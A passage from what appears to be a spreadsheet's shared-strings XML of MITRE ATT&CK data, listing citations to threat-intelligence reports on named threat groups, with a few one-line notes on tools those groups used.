    <t>(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>(Citation: Novetta-Axiom)(Citation: Cisco Group 72)</t>
  </si>
  <si>
    <t>(Citation: Cisco Group 72)(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>(Citation: Talos ZxShell Oct 2014)(Citation: Cisco Group 72)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Daserf Nov 2017)(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>(Citation: Recorded Future RedEcho Feb 2021)</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018)(Citation: Trend Micro Waterbear December 2019)(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t>(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t>(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>(Citation: Group-IB Anunak)</t>
  </si>
  <si>
    <t>(Citation: Cycraft Chimera April 2020)</t>
  </si>
  <si>
    <t>(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)(Citation: Proofpoint Cobalt June 2017) (Citation: RiskIQ Cobalt Nov 2017)(Citation: RiskIQ Cobalt Jan 2018)(Citation: Crowdstrike Global Threat Report Feb 2018)(Citation: TrendMicro Cobalt Group Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>(Citation: Talos Cobalt Group July 2018)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>(Citation: PTSecurity Cobalt Dec 2016)</t>
  </si>
  <si>
    <t>(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t>(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: Securelist DarkVishnya Dec 2018) </t>
  </si>
  <si>
    <t>(Citation: ThreatConnect Anthem)</t>
  </si>
  <si>
    <t>(Citation: Symantec Black Vine)</t>
  </si>
  <si>
    <t>(Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>(Citation: New DragonOK)</t>
  </si>
  <si>
    <t>(Citation: Operation Quantum Entanglement)</t>
  </si>
  <si>
    <t>(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON LIBERTY July 2019)(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>(Citation: US-CERT TA18-074A)(Citation: Core Security Impacket)</t>
  </si>
  <si>
    <t>(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON LIBERTY July 2019)</t>
  </si>
  <si>
    <t>(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON LIBERTY July 2019)(Citation: US-CERT TA18-074A)(Citation: Symantec Dragonfly Sept 2017)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>(Citation: Symantec Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Ember Bear Profile March 2022)(Citation: Mandiant UNC2589 March 2022)</t>
  </si>
  <si>
    <t>(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) uses a customized version of PsExec.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>(Citation: DarkReading FireEye FIN5 Oct 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>(Citation: SentinelOne FrameworkPOS September 2019)(Citation: Crowdstrike Global Threat Report Feb 2018)(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye Maze May 2020)</t>
  </si>
  <si>
    <t>(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>(Citation: Security Intelligence More Eggs Aug 2019)(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: DOJ FIN7 Aug 2018)(Citation: IBM Ransomware Trends September 2020)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: FBI Flash FIN7 USB)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Carbon Spider August 2021)(Citation: FBI Flash FIN7 USB)</t>
  </si>
  <si>
    <t xml:space="preserve">
(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>(Citation: SecureList Griffon May 2019)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: FBI Flash FIN7 USB)</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN7 April 2017)(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>(Citation: Threatpost Lizar May 2021)(Citation: Gemini FIN7 Oct 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>(Citation: Trustwave Pillowmint June 2020)(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>(Citation: IBM Ransomware Trends September 2020)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: FBI Flash FIN7 USB)</t>
  </si>
  <si>
    <t>(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>(Citation: FireEye Fin8 May 2016)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike PIONEER KITTEN August 2020)</t>
  </si>
  <si>
    <t>(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>(Citation: Anomali Static Kitten February 2021)(Citation: Tetra Defense Sodinokibi March 2020)</t>
  </si>
  <si>
    <t>(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)</t>
  </si>
  <si>
    <t>(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Gamaredon Feb 2017)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)(Citation: Secureworks IRON TILDEN Profile)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>(Citation: Volexity Exchange Marauder March 2021)(Citation: FireEye Exchange Zero Days March 2021)</t>
  </si>
  <si>
    <t>(Citation: Tarrask scheduled task)</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: Tarrask scheduled task) </t>
  </si>
  <si>
    <t>(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Lyceum October 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>(Citation: ClearSky Siamesekitten August 2021)(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>(Citation: Malwarebytes Higaisa 2020)</t>
  </si>
  <si>
    <t>(Citation: Malwarebytes Higaisa 2020)(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>(Citation: Securelist APT Trends Q2 2017)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike EvilCorp March 2021)</t>
  </si>
  <si>
    <t>(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>(Citation: NCC Group WastedLocker June 2020)(Citation: Crowdstrike EvilCorp March 2021)</t>
  </si>
  <si>
    <t>(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>(Citation: CISA AA20-301A Kimsuky)(Citation: Cybereason Kimsuky November 2020)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>(Citation: Netscout Stolen Pencil Dec 2018)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>(Citation: Netscout Stolen Pencil Dec 2018)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Kimsuky November 2020)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Dtrack)</t>
  </si>
  <si>
    <t>(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>(Citation: Lazarus RATANKBA)</t>
  </si>
  <si>
    <t>(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky ThreatNeedle Feb 2021)</t>
  </si>
  <si>
    <t>(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT38 Oct 2018)(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>(Citation: Novetta Blockbuster Loaders)</t>
  </si>
  <si>
    <t>(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>(Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018)(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>(Citation: Spring Dragon Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>(Citation: Lotus Blossom Dec 2015)(Citation: Emissary Trojan Feb 2016)</t>
  </si>
  <si>
    <t>(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT35 2018)</t>
  </si>
  <si>
    <t>(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)(Citation: Secureworks Cobalt Gypsy Feb 2017)</t>
  </si>
  <si>
    <t>(Citation: Haq 2014)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>(Citation: DustySky)(Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>(Citation: DustySky)(Citation: DustySky2)(Citation: FireEye Operation Molerats)</t>
  </si>
  <si>
    <t>(Citation: Unit42 Molerat Mar 2020) (Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro POWERSTATS V3 June 2019)(Citation: Symantec MuddyWater Dec 2018)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>(Citation: Reaqta MuddyWater November 2017)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>(Citation: Symantec MuddyWater Dec 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 MuddyWater Nov 2017)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater June 2019)</t>
  </si>
  <si>
    <t>(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: McAfee Dianxun March 2021)</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Avira Mustang Panda January 2020)(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Recorded Future REDDELTA July 2020)</t>
  </si>
  <si>
    <t>(Citation: Microsoft NEODYMIUM Dec 2016)(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>(Citation: CheckPoint Naikon May 2020)(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>(Citation: Baumgartner Naikon 2015)(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>(Citation: Baumgartner Naikon 2015)(Citation: CameraShy)</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) </t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Dec 2017) (Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto OilRig May 2016)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: Crowdstrike Helix Kitten Nov 2018)</t>
  </si>
  <si>
    <t>(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT35 2018)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto OilRig May 2016)(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto OilRig Oct 2016)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>(Citation: Villeneuve 2014)</t>
  </si>
  <si>
    <t>(Citation: Bizeul 2014)</t>
  </si>
  <si>
    <t>(Citation: Bizeul 2014)(Citation: Villeneuve 2014)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON VIKING )</t>
  </si>
  <si>
    <t>(Citation: iSIGHT Sandworm 2014)(Citation: F-Secure BlackEnergy 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Secureworks IRON VIKING )</t>
  </si>
  <si>
    <t>(Citation: NCSC CISA Cyclops Blink Advisory February 2022)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>(Citation: Dragos Crashoverride 2018)(Citation: Dragos Crashoverride 2017)(Citation: ESET Industroyer)(Citation: Secureworks IRON VIKING)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Secureworks IRON VIKING )</t>
  </si>
  <si>
    <t>(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Secureworks IRON VIKING )(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike GTR 2019)(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>(Citation: Group IB Silence Aug 2019)</t>
  </si>
  <si>
    <t>(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>(Citation: SecureList Silence Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: Unit42 SilverTerrier 2018)</t>
  </si>
  <si>
    <t>(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>(Citation: Symantec Strider Blog)(Citation: Kaspersky ProjectSauron Blog)</t>
  </si>
  <si>
    <t>(Citation: Symantec Suckfly March 2016)(Citation: Symantec Suckfly May 2016)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) has used a Gh0st variant known as PCrat/Gh0st.(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>(Citation: NCC Group TA505)</t>
  </si>
  <si>
    <t>(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>(Citation: Unit42 Clop April 2021)(Citation: Cybereason Clop Dec 2020)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Jan 2019)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Sep 2017)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: Unit 42 TA551 Jan 2021)(Citation: Secureworks GOLD CABIN)</t>
  </si>
  <si>
    <t>(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>(Citation: FireEye TRITON 2019)(Citation: Dragos Xenotime 2018)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>(Citation: ATT TeamTNT Chimaera September 2020)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Black-T October 2020)</t>
  </si>
  <si>
    <t>(Citation: TeamTNT Cloud Enumeration)</t>
  </si>
  <si>
    <t>(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used a modified version of ASPXSpy called ASPXTool.(Citation: Dell TG-3390)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
